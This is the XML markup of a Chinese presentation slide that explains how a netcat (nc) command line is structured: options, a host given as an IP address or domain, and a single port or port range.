            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="15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36816" y="1086864"/>
            <a:ext cx="5779341" cy="811382"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="9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51348" tIns="25672" rIns="51348" bIns="25672" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="324485" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="648970" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="973455" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1297940" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1622425" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="1946910" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2271395" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="2595880" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" defTabSz="684530"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="975">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="六边形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699116" y="2069897"/>
            <a:ext cx="1225805" cy="1056973"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">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lIns="51348" tIns="25672" rIns="51348" bIns="25672" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="324485" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="648970" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="973455" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1297940" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1622425" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="1946910" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2271395" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="2595880" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" defTabSz="684530"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="直接箭头连接符 3"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="3" idx="5"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1660679" y="1551373"/>
            <a:ext cx="683027" cy="518524"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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a:stCxn id="3" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1924922" y="2598383"/>
            <a:ext cx="505362" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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a:stCxn id="3" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1660679" y="3126869"/>
            <a:ext cx="769605" cy="526559"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="414455"/>
            </a:solidFill>
            <a:tailEnd type="arrow"/>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2536816" y="2192691"/>
            <a:ext cx="5779341" cy="811382"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="9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51348" tIns="25672" rIns="51348" bIns="25672" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="324485" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="648970" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="973455" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1297940" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1622425" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="1946910" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2271395" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="2595880" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" defTabSz="684530"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="975">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2536816" y="3247736"/>
            <a:ext cx="5779341" cy="811382"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="9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51348" tIns="25672" rIns="51348" bIns="25672" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="324485" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="648970" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="973455" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1297940" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1622425" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="1946910" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2271395" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="2595880" algn="l" defTabSz="648970" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1300" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" defTabSz="684530"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="975">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="856397" y="2221911"/>
            <a:ext cx="869701" cy="6451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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>nc 的命令行</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0" name="文本框 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2687660" y="1108253"/>
            <a:ext cx="2900041" cy="4025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94690">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>选项</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2687660" y="1454079"/>
            <a:ext cx="5528626" cy="468315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="67500" tIns="0" rIns="67500" bIns="0" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="825" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>这部分可能包含 0~N 个选项  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="825" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="825" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（注：这部分最复杂，下一个小节单独聊）  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="825" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2687660" y="2216839"/>
            <a:ext cx="1721984" cy="4025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94690">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>主机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1350" b="1" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Malgun Gothic Semilight" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2687660" y="2589230"/>
            <a:ext cx="5488675" cy="370545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="67500" tIns="0" rIns="67500" bIns="0" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>这部分可能没有，可能以 “点分十进制” 形式表示，也可能以 “域名” 形式表示。 </a:t>
            </a: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14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2687660" y="3263737"/>
            <a:ext cx="2900041" cy="402590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="694690">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2687660" y="3626794"/>
            <a:ext cx="5559993" cy="574563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="67500" tIns="0" rIns="67500" bIns="0" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="825" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>这部分可能没有，可能是单个端口，可能是端口范围。  </a:t>
